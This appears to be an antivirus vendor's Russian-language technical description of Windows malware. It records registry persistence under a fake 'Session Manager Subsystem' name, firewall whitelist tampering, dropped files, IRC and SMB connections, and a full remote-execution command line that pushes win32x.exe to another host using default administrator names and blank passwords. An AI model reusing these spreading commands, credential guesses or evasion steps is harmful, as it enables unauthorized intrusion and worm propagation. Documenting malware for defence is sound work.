Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Session Manager Subsystem' = '<LS_APPDATA>\ssms.exe'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\px.exe' = '<LS_APPDATA>\px.exe:*:Enabled:px.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\ssms.exe' = '<LS_APPDATA>\ssms.exe:*:Enabled:ssms.exe'
Создает и запускает на исполнение:
- <LS_APPDATA>\px.exe \\48.214.72.91 -u Administrador -p "" -c -f -d win32x.exe \\48.214.72.91 -u Administrateur -p "" -c -f -d win32x.exe \\48.214.72.91 -u Verwalter -p "" -c -f -d win32x.exe \\48.214.72.91 -u Coordinatore -p "" -c -f -d win32x.exe \\48.214.72.91 -u "Small Business Admin" -p "" -c -f -d win32x.exe \\48.214.72.91 -u Owner -p "" -c -f -d win32x.exe \\48.214.72.91 -u %USERNAME% -p "" -c -f -d win32x.exe \\48.214.72.91 -u admin -p admin -c -f -d win32x.exe \\48.214.72.91 -u User -p "" -c -f -d win32x.exe
- <LS_APPDATA>\wn.exe hide -p ssms.exe
- <LS_APPDATA>\ssms.exe
Изменения в файловой системе:
Создает следующие файлы:
- <LS_APPDATA>\fp.exe
- <LS_APPDATA>\MSWINSCK.OCX
- <LS_APPDATA>\msvbvm60.dll
- <LS_APPDATA>\ssms.exe
- <LS_APPDATA>\px.exe
- <LS_APPDATA>\wn.exe
Сетевая активность:
Подключается к:
- '48.##0.121.72':5900
- '48.##6.173.108':21
- 'ir#.#izon.net':6667
- '48.##4.72.91':445
UDP:
- DNS ASK ir#.#izon.net
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
